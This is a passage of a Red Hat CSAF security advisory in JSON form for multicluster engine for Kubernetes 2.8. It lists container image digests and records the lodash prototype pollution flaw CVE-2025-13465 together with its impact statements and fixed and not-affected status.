"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64"
},
"product_reference": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x as a component of multicluster engine for Kubernetes 2.8",
"product_id": "multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x"
},
"product_reference": "registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x",
"relates_to_product_reference": "multicluster engine for Kubernetes 2.8"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-13465",
"cwe": {
"id": "CWE-1321",
"name": "Improperly Controlled Modification of Object Prototype Attributes (\u0027Prototype Pollution\u0027)"
},
"discovery_date": "2026-01-21T20:01:28.774829+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:3aa5791c30722dc9a41b11af0e6165b16e1fbb90f9223402f15ccd1b3ab87bcb_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:61aca1200e3f76ad5608ec2fea60192281cfd8dc883ca95a952d4634b362b28d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:74d46cd69f0ea430d4f64bb7eb2c7801552fd75180bd174afba4280202487a9b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-addon-rhel9@sha256:d69c9156ba667438e59cb8c71a905fd92a26e830629a5c20223d70173a64a95b_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:79bbb4f57c6b596c4926a8bc3a8fb9f885f05251a6c93a903622ea18ed77f224_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:ac44ed8760e5bf9d701b3cf4296805d1df6f6b9cb57b3e0a7557239de1a542b7_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:b0c796e0d0eea701ebcb55c646042a020d71e18595e260644884596b04dd1def_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-proxy-rhel9@sha256:d47167421192458b70433c97afbee742ede2a650c7af0ce54b126fa251cc1ea7_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:1ab0fe650316e0640421fbc361eae235c4a0175c7467acd5e8ad414a8fd1fc75_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:4355c558ed342b1e96f4b23c53b229d22ef4ee48378980eb7359d7864e15fe6d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:b496e4274643266a37d7ba7134f71e3aa262df65e4c04b9148ee9d7a67da669a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterclaims-controller-rhel9@sha256:ddda8b74fb8cbde98a90fc89c62608dce08a022c0e63ae90a1a0b52123da1c2c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:36b56d6b9609512532fdae217b892ebc40ce774161e6f90176b052cf7ee686a3_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:575cb613c7cc81507a3e6235e30b0ffbb34f145e2bb6b97632d68ed5e73fd090_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:a8d65fb8b81be9613bc732f696ef245aad46a23335de455d258598dd86c19f8d_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/clusterlifecycle-state-metrics-rhel9@sha256:e9d6ed28fbbe6a3aeb2050c6e8fc3f8a5b6cc7546ee996006e92031294f83d2f_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:4100f29f8a8ba48956cc570cc2a65bc38b9fffa9b946fc3c6253bd0a54f25065_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:850c60717c0c3a8cdc7bb742721e73dbcd8928443fb6776003e3ca71fdd17982_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:c9e8a0a70d60dd717a2f9c8018f1ce963ce25079476a64e8743e826e616ffb00_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/discovery-rhel9@sha256:d7dd81c6f47faf4e07602dfed2229b27d8064d8180009b4bc62189030575d421_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:6a25acbc7851fdb9ab19d6f3286e50db85f07064f59a604aedaff48800b06572_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c02087ae03cff78d4a3fba8887ef55d33cd00a8f2f74806368bf683fa73c0e46_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:c95f5edf4111dc9077d07c0c81df6fc238c6d048d22793f83f7be08bc673b9d3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hive-rhel9@sha256:d2cc92420cffc159ce7f27104ba9e49745198e9e3314683209624e4a1a3f041a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:55928ce9d57439303297ac900fc0b4f95de64ee691a332a21995cf09342c1aff_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:d2949213c7c3f93b0b59082ecdc69f4e05b8038a43afc216926ec43714a73346_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fb49af7cc738943c59aef8a8b860b00f5e854cc95d58a88461c30ebea0f329c3_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-addon-rhel9-operator@sha256:fff7cebbf5360ae8830e3650f72b5c269be15b9892848f0a3408ed47abb5a5ad_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:4d8f346ef3bffeed12b3c64e5ebed22f8d79397e915c0bfbbc5bf03ee809c0a0_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:913120c0fc826c2f8ed1f2cba5e71c91e2c440e50be043ab912d688b230aa0fb_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:c3633df794c0803b27d8607d1391eb66af8c104712584ba326d04e4cae8627d6_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-cli-rhel9@sha256:d57138c750131113f09ce1259f5702a0d4b984fb29d5d7994c5dc4ad6aaaf39b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:1766984333b3b3d1d1614bafef596fb94351b3358e04e32d46e20752b60a0d9e_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:17c676d8e456102d877a7feee97c7164ee9f71e21763c5561bed8ac24e5dc2d0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:9e94ed8885a79d3c7ca3a41ffba43455b410435ea0090fb5c6598eefc5156b22_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/hypershift-rhel9-operator@sha256:b078e01e6a3d6a04c2e364d42aa4a5be37bb2aa279ae484c524ae58293aacc3a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:8edafac72bd8526384c33b749595be0986d86957b79ac7ac7ae37b435f27351e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9532ce55aa8e3553bd102a891ca6e2b6cf93f23da41c71ba184e769dd1328410_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:9d146a6192bc9251ceb9443e32c708cfbb7cd542f6d9621c1dbbbdff50ede9ae_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/image-based-install-rhel9@sha256:e227cdab2e061d70761d510b0d9c99b4dcf735d0257809c6757155ef18bb341f_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:62fd673d06de31af8b7946b6eb657c69e064dc1e8639197e689375be3a331c90_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:bb9014907e1d57647589efe637bf133e631d03ac94e1c30181eccf6ea8bddc6b_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:d81f2ab37bd8c6e5aaccd0ed2b94fbc2bf88934f3ffda8fde7add64b9f051966_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/kube-rbac-proxy-mce-rhel9@sha256:dad80c9983167fb8fd98912c890b3a1dbcac2cbadf417c7771a3fda2f23f832c_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:4be015b2648cd7f4edb2aa29521f283959db8336ce4df5497ad8465a031bd3c4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:758c0f95e9895b61a86e3ff4f4c2570f278c7af13ad3a5876d785829b746bf42_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:9082cef0cbf513a3c33309be5e83774cf92ddae6045c571f43718583da451d8d_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managed-serviceaccount-rhel9@sha256:f1f8475bacfa68df75fa015dfd7fb73565ed2b0b73fe8eeec26c2831862d7175_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:11e40e57f6d48e0eba7e4ed12f4ef55b84ec9f93d2534712318d259dc4fcf4a5_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:132e7098ba9e2ac1e02e04e828359073ecc322a5e9e804badb1e0e5934ff32fe_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:3cdd76fda529eb46161cac023a40b1420d85cfe6ac9100986796e4f49ea5e7c2_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/managedcluster-import-controller-rhel9@sha256:7805f6d13f8a8a1309c2821622706e0e81c6b0a99f18ca761f031937d67fd484_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:1b8f3645dca1f463be8be4f3bbde53cfb0a28412ddc7f20eed9e39b4f7f02979_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:31b3f532cfa55e76563251f01008c9998b71ba33a4dd75c3307db32173d6ff39_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5a063e1f8a5d0ff90f7c948f332fff502fc00be8ede14bd0ef4b38ab09717c72_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/multicloud-manager-rhel9@sha256:5cde57462724bc2ebd303b29d6127d2fdffcd4c4b93ea443eb6ac55290031960_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:45ef14cb6ce30aaf3780fbb5656dae822825b892e165469c0c732e613f452c94_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:9460807bdb775b166264de2b0a5eb348b144cb9a7a0b1d42190a3ce54bea8d63_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:97bb4216555694418e609366ecb47bd1c8336c1e97e76039df4949c5be4fb997_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/must-gather-rhel9@sha256:b9bc631124b8d4f95faf4de518915fc8bd519edf11055b703ee223c0c4813b52_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:05689e767759be2e46620c752e079847fad0941193456dad22ed33111e69f44c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:18b0f392942a743b23dc4db9ccccaf467053e70bdad97f1714d0d413f66eaf71_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:32e1fac10eb855484152f41d6a2e4b3fa6fb9c63afd10c5d546db29916f40816_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/placement-rhel9@sha256:c0aeadd784317f5d0a5415bb2002ab6116f2c947c00fc8df9e2a91e907e108bf_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:24c9f0cb19b5e95ee037583eff0c5e683c98d65868f57221e36db1fe1aaad96b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:4def0b462d24131336a8f641edf6206d9eac005b61d1abd3739b549e74794ee9_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:659a041590140f69a2a0952769a53240e12d770cb7440fc0ac1af4198470e684_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/provider-credential-controller-rhel9@sha256:fd72d5e49c2d10e1ccb16547ee8563ad5c1c4a09960f6c3563b8f394e031c50e_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:2ff4c94a03c71dc68b519db391d0b7f9787e7709df2e5d16aa837fcf522418de_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:b98f70827db37e91dc99336043552d1375cd94a7bbab3c0abcfa7f7d33b3d3d6_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:e7adcd557f69ccf4893c0f40b5ccb19264a401ea98436b5072d1b7593d120bc4_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-operator-rhel9@sha256:eeaf14966d50a750a665ef6304f3ca82b50c0cfe147acf796714ddd0642d51f2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:126b982ac1e4ca447773a3c9099691f0ad5dca0d7a4101877724421d613c459b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:548fe802bc62d3ff20ee0b13dcd9792eb304f11d5d496562ad1c2d80b5796c67_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:772e9e4da783b4d33ff1846a6b8fc9ab7acefe76dd21eb3030c83f6352050894_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/registration-rhel9@sha256:d6622aa3381f9ac73e6f3c9764ffe357a434d021c62d20d5a95ebb586b66d87b_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:08ffacc73e8bdd40fbd4e913971eb1621a09329c85ec123e1781c08515cf3b5a_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:174f055bd042d6ec4e056ef9f6bb430f0b7e68211ee56155aee1d02f6b26a53a_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:4248348b507e9a78095ffa9d7a2ef4ff87880f65fdfc8ae71e67018655705c53_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/work-rhel9@sha256:de69889c3af110ae6613401431a384781ece6f82bbe2933b81dedef602be9005_s390x"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2431740"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Lodash. A prototype pollution vulnerability in the _.unset and _.omit functions allows an attacker able to control property paths to delete methods from global prototypes. By removing essential functionalities, this can result in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "lodash: prototype pollution in _.unset and _.omit functions",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This issue is only exploitable by applications using the _.unset and _.omit functions on an object and allowing user input to determine the path of the property to be removed. This issue only allows the deletion of properties but does not allow overwriting their behavior, limiting the impact to a denial of service. Due to this reason, this vulnerability has been rated with an important severity.\n\nIn Grafana, JavaScript code runs only in the browser, while the server side is all Golang. Therefore, the worst-case scenario is a loss of functionality in the client application inside the browser. To reflect this, the CVSS availability metric and the severity of the Grafana and the Grafana-PCP component have been updated to low and moderate, respectively.\n\nThe lodash dependency is bundled and used by the pcs-web-ui component of the PCS package. In Red Hat Enterprise Linux 8.10, the pcs-web-ui component is no longer included in the PCS package. As a result, RHEL 8.10 does not ship the vulnerable lodash component within PCS and is therefore not-affected by this CVE.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:4943997b1fed0e8fada897f8296fafd2ec82c69d51f0779b0f1591c9ce2dcc2a_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:7f98a0535715ba9925f93f16c41fc2cfdc16ee8fb32654336f7c5a09b0e7d9dd_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:896deef9b7467a814e9e79a4366da9daf969b2c260ec30a517dfa30887e10205_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/console-mce-rhel9@sha256:a520297678ce3bd9a01a1e64b41833535d30ba469e55f26c462af1303c0f959d_ppc64le"
],
"known_not_affected": [
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:8726da36d26d647248ec7d0a38c37760a86b909d5e32535cd79573ba73418e65_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:b0c5ea5c0c5cb1ffb39a18da2d69714adeab262037769c8bb61a08165a9b249d_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:e7d9e3b4d184144fe0048620e63f8605ba70ff6ba6b5f91d911facbe2cc43dc9_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/addon-manager-rhel9@sha256:f6bf8d199b9346b82197c5911b00d4a7a6cb9b7c84d5b0c3d5052aee07e23f53_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:553edf965192cf55bc245e8a3bbf3a27545d62d03d311acc24062a2554a2e85f_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:5d7b59bfe6851def3f341bfad75ef2e6fcea8cc77ea3268167519f8d3bae5c33_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:6abe1731496380fe823109b6acc4415130e65d51722e27da134eb79f0a3f4f18_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/backplane-rhel9-operator@sha256:baedd408112b3fbd00b03ff80f5bf1afc390250aa5aa07ed4e83aadc5ea47e4c_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:797e7b8b8dd7e769d8af43c94076e17b0e9dad73121bafd44368b95c0e5b21d2_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:a368438d68a76db54dc21edee2a9dfe0356201730e5edaf3efe2e5d35cf4812b_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:c18392461e4b948a1e269a91750048df39b06512e0c12b35ca2bfcbd7cbfc6bc_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-agent-rhel9@sha256:d4e3c622c9e9e9fd7715efe0675082b313811c3ad4be4d483b0bd6df4137b98d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:384d7665ebd94ba2c06dc5039f63b2e5d9a7562c2c55dc5018a4605cb72f8159_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:6efea98320dbf13ef6b7bd24cc45b5cddc2f9368b71556770abd846f27b0b989_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:98fade294c1ff0688c36878f62275e82a2b19696c2a01edd5fa78acca4a99104_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-api-provider-kubevirt-rhel9@sha256:e26c917cc85445632f6e971636a98d5e7a0bbc3c1fd3dc647385c3ab4abf13f0_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:5e4dde4a4e91f67ad09ea3fe2b685731570fbbdab3bed1729f727ed50728f0aa_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:89623857fddc1cb6a4c00f7927adeebe64a9035b104bee39c7c4e5ca73d4161a_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:928850a95a992b3cad76163aa68c17971cd1c4d2eb4cc2aa7495fa43a03c7f9c_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-curator-controller-rhel9@sha256:ad1094291b455efbcb67c99059f25aa0c324a8ea57f1b4917995ca8daefe602d_s390x",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:1903cc91969e1e9a9d90676abbaf6a13af2644ab4678c4354cc4c436c7d73320_amd64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:6eaae5bbd36db4137748ce56b9bdb89440d46cf33e44deb7886742151a926233_ppc64le",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:ad396a22c7dfc18d3755b5226322b02cf53e9d889d8c4c0fd9f3fc18640d5229_arm64",
"multicluster engine for Kubernetes 2.8:registry.redhat.io/multicluster-engine/cluster-image-set-controller-rhel9@sha256:f4e156751bf139839b078a9ed28ac273209573d752850d2191cf523168ecef3c_s390x",
